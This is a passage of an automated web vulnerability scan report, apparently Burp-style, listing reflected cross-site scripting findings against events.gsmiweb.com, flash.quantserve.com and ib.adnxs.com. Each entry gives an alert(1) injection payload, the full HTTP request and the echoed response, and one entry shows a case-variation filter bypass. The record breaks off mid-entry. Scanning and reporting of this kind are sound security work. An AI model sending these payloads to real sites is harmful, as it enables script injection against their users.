Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<link rel="stylesheet" href="css/default.advanced.css" type="tex
...[SNIP]...
</a>November 201016900<script>alert(1)</script>9589fe881f</h2>
...[SNIP]...

1.23. https://events.gsmiweb.com/pastevents.php [monthyear parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /pastevents.php

Issue detail

The value of the monthyear request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6ea1"><script>alert(1)</script>33a545df4c was submitted in the monthyear parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pastevents.php?monthyear=November%202010b6ea1"><script>alert(1)</script>33a545df4c HTTP/1.1
Referer: https://events.gsmiweb.com/pastevents.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:44:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6468
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<link rel="stylesheet" href="css/default.advanced.css" type="tex
...[SNIP]...
<a name="November 2010b6ea1"><script>alert(1)</script>33a545df4c">
...[SNIP]...

1.24. https://events.gsmiweb.com/pastevents.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /pastevents.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5024a"><script>alert(1)</script>01ce7810ada was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pastevents.php?monthyear=November%20/5024a"><script>alert(1)</script>01ce7810ada2010 HTTP/1.1
Referer: https://events.gsmiweb.com/pastevents.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:45:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6472
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<link rel="stylesheet" href="css/default.advanced.css" type="tex
...[SNIP]...
<a name="November /5024a"><script>alert(1)</script>01ce7810ada2010">
...[SNIP]...

1.25. https://events.gsmiweb.com/pastevents.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /pastevents.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 55fd3<script>alert(1)</script>38869ccc481 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pastevents.php?monthyear=November%20/55fd3<script>alert(1)</script>38869ccc4812010 HTTP/1.1
Referer: https://events.gsmiweb.com/pastevents.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:45:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6468
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<link rel="stylesheet" href="css/default.advanced.css" type="tex
...[SNIP]...
</a>November /55fd3<script>alert(1)</script>38869ccc4812010</h2>
...[SNIP]...

1.26. https://events.gsmiweb.com/process_payment.php [contactid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /process_payment.php

Issue detail

The value of the contactid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a9ee"><script>alert(1)</script>6230c787a34 was submitted in the contactid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /process_payment.php?contactid=5a9ee"><script>alert(1)</script>6230c787a34 HTTP/1.1
Referer: https://events.gsmiweb.com/searchsubscribe.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:44:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9910


INVALID_QUERY_FILTER_OPERATOR:
Email,AccountId from Contact where Id='5a9ee"><script>alert(1)</script>6230c787a34'
^
ERROR at Row:1:Column:174
invalid ID field: 5a
...[SNIP]...
<input type="hidden" name="contactid" id="contactid" value="5a9ee"><script>alert(1)</script>6230c787a34">
...[SNIP]...

1.27. https://events.gsmiweb.com/process_payment.php [contactid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /process_payment.php

Issue detail

The value of the contactid request parameter is copied into the HTML document as plain text between tags. The payload 9c8ba<script>alert(1)</script>0708dd5fd30 was submitted in the contactid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /process_payment.php?contactid=9c8ba<script>alert(1)</script>0708dd5fd30 HTTP/1.1
Referer: https://events.gsmiweb.com/searchsubscribe.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:44:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9904


INVALID_QUERY_FILTER_OPERATOR:
Email,AccountId from Contact where Id='9c8ba<script>alert(1)</script>0708dd5fd30'
^
ERROR at Row:1:Column:174
invalid ID field: 9c8ba<script>
...[SNIP]...

1.28. https://events.gsmiweb.com/subscribe.php [amountInDollars parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The value of the amountInDollars request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ee8"><script>alert(1)</script>6c9e5934c07 was submitted in the amountInDollars parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /subscribe.php?event_id=106 HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Content-Length: 691
Cache-Control: max-age=0
Origin: https://events.gsmiweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://events.gsmiweb.com/subscribe.php?event_id=106
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=s0dkub7pth8ifm00osap2qvl65

contact_fname=&contact_lname=&title=&event=Green+Data+Center+Conference+and+Exhibition&eventid=106&company=&department=&address=&city=&state=&zip=&phone=&fax=&email=&conference=&workshopsession1=1&wor
...[SNIP]...
workshopsession2=2&sncount=4&pakdis=&workshop=&priceconfid=0&priceworkshopid=&workshop_alphabet=&discountamount=0&discountcode=&balance_after_ct=&coupon_amount=&percentagecal=&amount=&amountInDollars=c1ee8"><script>alert(1)</script>6c9e5934c07&displaySymbol=%24&symbolToDisplay=USD&vatpercentage=&currencyRate=&total=&avail_balance=&coupon=&payment_method=po&cc_type=&card_num=&exp_month=10&exp_year=11&first_name=&last_name=&leed_source=&diet
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:46:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 41129


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head> <meta http-equiv="content-type" content="text/html;charset=ISO-
...[SNIP]...
<input name="amountInDollars" type="text" id="amountInDollars" value="c1ee8"><script>alert(1)</script>6c9e5934c07" size="10" readonly>
...[SNIP]...

1.29. https://events.gsmiweb.com/subscribe.php [discountamount parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The value of the discountamount request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f64"><script>alert(1)</script>573ef5a17a1c9aeac was submitted in the discountamount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /subscribe.php?event_id=94&contact_fname=&contact_lname=&title=&event=Quality+Assurance+Masters+Training&eventid=94&company=&department=&address=&city=&state=&zip=&phone=&fax=&email=&conferenceval=2095.00%2c406&conference=&reset=reset&sncount=4&pakdis=&workshop=&priceconfid=0&priceworkshopid=&workshop_alphabet=&discountamount=024f64"><script>alert(1)</script>573ef5a17a1c9aeac&discountcode=&balance_after_ct=&coupon_amount=&percentagecal=&amount=&amountInDollars=&displaySymbol=%24&symbolToDisplay=USD&vatpercentage=&currencyRate=&total=&avail_balance=&coupon=&payment_method=cc&cc_type=&card_num=&exp_month=10&exp_year=11 HTTP/1.1
Referer: https://events.gsmiweb.com/subscribe.php?event_id=94
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:46:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 39277


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head> <meta http-equiv="content-type" content="text/html;charset=ISO-
...[SNIP]...
<input name="discountamount" type="hidden" id="discountamount" value="024f64"><script>alert(1)</script>573ef5a17a1c9aeac">
...[SNIP]...

1.30. https://events.gsmiweb.com/subscribe.php [priceconfid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The value of the priceconfid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9e37"><script>alert(1)</script>1fb11249e6bac6af0 was submitted in the priceconfid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /subscribe.php?event_id=94&contact_fname=&contact_lname=&title=&event=Quality+Assurance+Masters+Training&eventid=94&company=&department=&address=&city=&state=&zip=&phone=&fax=&email=&conferenceval=2095.00%2c406&conference=&reset=reset&sncount=4&pakdis=&workshop=&priceconfid=0a9e37"><script>alert(1)</script>1fb11249e6bac6af0&priceworkshopid=&workshop_alphabet=&discountamount=0&discountcode=&balance_after_ct=&coupon_amount=&percentagecal=&amount=&amountInDollars=&displaySymbol=%24&symbolToDisplay=USD&vatpercentage=&currencyRate=&total=&avail_balance=&coupon=&payment_method=cc&cc_type=&card_num=&exp_month=10&exp_year=11 HTTP/1.1
Referer: https://events.gsmiweb.com/subscribe.php?event_id=94
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:46:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 39277


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head> <meta http-equiv="content-type" content="text/html;charset=ISO-
...[SNIP]...
<input name="priceconfid" type="hidden" id="priceconfid" value="0a9e37"><script>alert(1)</script>1fb11249e6bac6af0">
...[SNIP]...

1.31. https://events.gsmiweb.com/subscribe.php [priceworkshopid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The value of the priceworkshopid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4821"><script>alert(1)</script>e46068f380d9d7019 was submitted in the priceworkshopid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /subscribe.php?event_id=94&contact_fname=&contact_lname=&title=&event=Quality+Assurance+Masters+Training&eventid=94&company=&department=&address=&city=&state=&zip=&phone=&fax=&email=&conferenceval=2095.00%2c406&conference=&reset=reset&sncount=4&pakdis=&workshop=&priceconfid=0&priceworkshopid=d4821"><script>alert(1)</script>e46068f380d9d7019&workshop_alphabet=&discountamount=0&discountcode=&balance_after_ct=&coupon_amount=&percentagecal=&amount=&amountInDollars=&displaySymbol=%24&symbolToDisplay=USD&vatpercentage=&currencyRate=&total=&avail_balance=&coupon=&payment_method=cc&cc_type=&card_num=&exp_month=10&exp_year=11 HTTP/1.1
Referer: https://events.gsmiweb.com/subscribe.php?event_id=94
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:46:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 39277


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head> <meta http-equiv="content-type" content="text/html;charset=ISO-
...[SNIP]...
<input name="priceworkshopid" type="hidden" id="priceworkshopid" value="d4821"><script>alert(1)</script>e46068f380d9d7019">
...[SNIP]...

1.32. https://events.gsmiweb.com/subscribe.php [workshop_alphabet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Issue detail

The value of the workshop_alphabet request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 607d4"><script>alert(1)</script>93a6221e1f64fe6ac was submitted in the workshop_alphabet parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /subscribe.php?event_id=94&contact_fname=&contact_lname=&title=&event=Quality+Assurance+Masters+Training&eventid=94&company=&department=&address=&city=&state=&zip=&phone=&fax=&email=&conferenceval=2095.00%2c406&conference=&reset=reset&sncount=4&pakdis=&workshop=&priceconfid=0&priceworkshopid=&workshop_alphabet=607d4"><script>alert(1)</script>93a6221e1f64fe6ac&discountamount=0&discountcode=&balance_after_ct=&coupon_amount=&percentagecal=&amount=&amountInDollars=&displaySymbol=%24&symbolToDisplay=USD&vatpercentage=&currencyRate=&total=&avail_balance=&coupon=&payment_method=cc&cc_type=&card_num=&exp_month=10&exp_year=11 HTTP/1.1
Referer: https://events.gsmiweb.com/subscribe.php?event_id=94
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=gr5t0m05avfcnfaqun5doi7ir4
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:46:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 39277


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head> <meta http-equiv="content-type" content="text/html;charset=ISO-
...[SNIP]...
<input name="workshop_alphabet" type="hidden" id="workshop_alphabet" value="607d4"><script>alert(1)</script>93a6221e1f64fe6ac">
...[SNIP]...

1.33. http://flash.quantserve.com/quant.swf [lc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://flash.quantserve.com
Path:   /quant.swf

Issue detail

The value of the lc request parameter is copied into the HTML document as plain text between tags. The payload a1846<ScRiPt>alert(1)</ScRiPt>2e99164033 was submitted in the lc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /quant.swf?userName=360i&qcv=2%2E1%2E1&pageURL=http%3A%2F%2Fblog%2E360i%2Ecom%2F&flashPlayer=WIN%2011%2C0%2C1%2C152&videoId=document%5Fembed%5Fplayer&media=widget&fpf=1%2D0%2D0&url=http%3A%2F%2Fstatic%2Eslidesharecdn%2Ecom%2Fswf%2Fdoc%5Fplayer%2Eswf%3Fdoc%3D360ipov%2Dfacebookf82011updates%2D110923063654%2Dphpapp01%26stripped%5Ftitle%3D360i%2Dreport%2Don%2Dthe%2Dfacebook%2Df8%2D2011%2Dupdates%26userName%3D360i&publisherId=p%2DabU44ONrAuwk2&server=http%3A%2F%2Fflash%2Equantserve%2Ecom&stripped%5Ftitle=360i%2Dreport%2Don%2Dthe%2Dfacebook%2Df8%2D2011%2Dupdates&doc=360ipov%2Dfacebookf82011updates%2D110923063654%2Dphpapp01&lc=%5F1317923787828%5F9456a1846<ScRiPt>alert(1)</ScRiPt>2e99164033 HTTP/1.1
Host: flash.quantserve.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://static.slidesharecdn.com/swf/doc_player.swf?doc=360ipov-facebookf82011updates-110923063654-phpapp01&stripped_title=360i-report-on-the-facebook-f8-2011-updates&userName=360i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: qoo=OPT_OUT; d=EHYBDAHwB7vR9w

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-shockwave-flash
Cache-Control: private, no-transform, max-age=86400
Expires: Fri, 07 Oct 2011 17:57:34 GMT
Content-Length: 4715
Date: Thu, 06 Oct 2011 17:57:34 GMT
Server: QS

FWS.k...x.._.........D.....C....?.A....i.n.setTrace.dothetrace.allowTrace.read_so._depth.setUpLocal_lc.remote_lc.LocalConnection.LOCAL_LCNAME.rpcResult.REMOTE_LCNAME.send.local_lc.allowDomain.allowIns
...[SNIP]...
ject not saved..quant Shared object flushed to disk..quant Shared object could not be flushed to disk..write_so.idToSecs.-.indexOf.slice.parseInt.Math.floor.Date.getTime..join.1-0-0._1317923787828_9456a1846<ScRiPt>alert(1)</ScRiPt>2e99164033.nothetrace.3.0.0.this.logs.initialize....initialize....)..............I............................=..    ..........O..............=................@...................    .
.................R....setUpLoc
...[SNIP]...

1.34. http://flash.quantserve.com/quant.swf [lc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://flash.quantserve.com
Path:   /quant.swf

Issue detail

The value of the lc request parameter is copied into the HTML document as plain text between tags. The payload aa02e<a%20b%3dc>9a7073630bc was submitted in the lc parameter. This input was echoed as aa02e<a b=c>9a7073630bc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quant.swf?videoId=document%5Fembed%5Fplayer&pageURL=http%3A%2F%2Fblog%2E360i%2Ecom%2F&publisherId=p%2DabU44ONrAuwk2&flashPlayer=WIN%2011%2C0%2C1%2C152&lc=%5F1317923648570%5F9194aa02e<a%20b%3dc>9a7073630bc&media=widget&doc=360ipov%2Dfacebookf82011updates%2D110923063654%2Dphpapp01&server=http%3A%2F%2Fflash%2Equantserve%2Ecom&url=http%3A%2F%2Fstatic%2Eslidesharecdn%2Ecom%2Fswf%2Fdoc%5Fplayer%2Eswf%3Fdoc%3D360ipov%2Dfacebookf82011updates%2D110923063654%2Dphpapp01%26stripped%5Ftitle%3D360i%2Dreport%2Don%2Dthe%2Dfacebook%2Df8%2D2011%2Dupdates%26userName%3D360i&userName=360i&fpf=1%2D0%2D0&stripped%5Ftitle=360i%2Dreport%2Don%2Dthe%2Dfacebook%2Df8%2D2011%2Dupdates&qcv=2%2E1%2E1 HTTP/1.1
Host: flash.quantserve.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://static.slidesharecdn.com/swf/doc_player.swf?doc=360ipov-facebookf82011updates-110923063654-phpapp01&stripped_title=360i-report-on-the-facebook-f8-2011-updates&userName=360i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: qoo=OPT_OUT; d=EHYBDAHwB7vR9w

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-shockwave-flash
Cache-Control: private, no-transform, max-age=86400
Expires: Fri, 07 Oct 2011 17:55:11 GMT
Content-Length: 4698
Date: Thu, 06 Oct 2011 17:55:11 GMT
Server: QS

FWS.Z...x.._.........D.....C....?.0....X.n.setTrace.dothetrace.allowTrace.read_so._depth.setUpLocal_lc.remote_lc.LocalConnection.LOCAL_LCNAME.rpcResult.REMOTE_LCNAME.send.local_lc.allowDomain.allowIns
...[SNIP]...
ject not saved..quant Shared object flushed to disk..quant Shared object could not be flushed to disk..write_so.idToSecs.-.indexOf.slice.parseInt.Math.floor.Date.getTime..join.1-0-0._1317923648570_9194aa02e<a b=c>9a7073630bc.nothetrace.3.0.0.this.logs.initialize....initialize....)..............I............................=..    ..........O..............=................@...................    .
.................R....setUpLoc
...[SNIP]...

1.35. http://ib.adnxs.com/ab [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0767'-alert(1)-'176e182b5ad was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

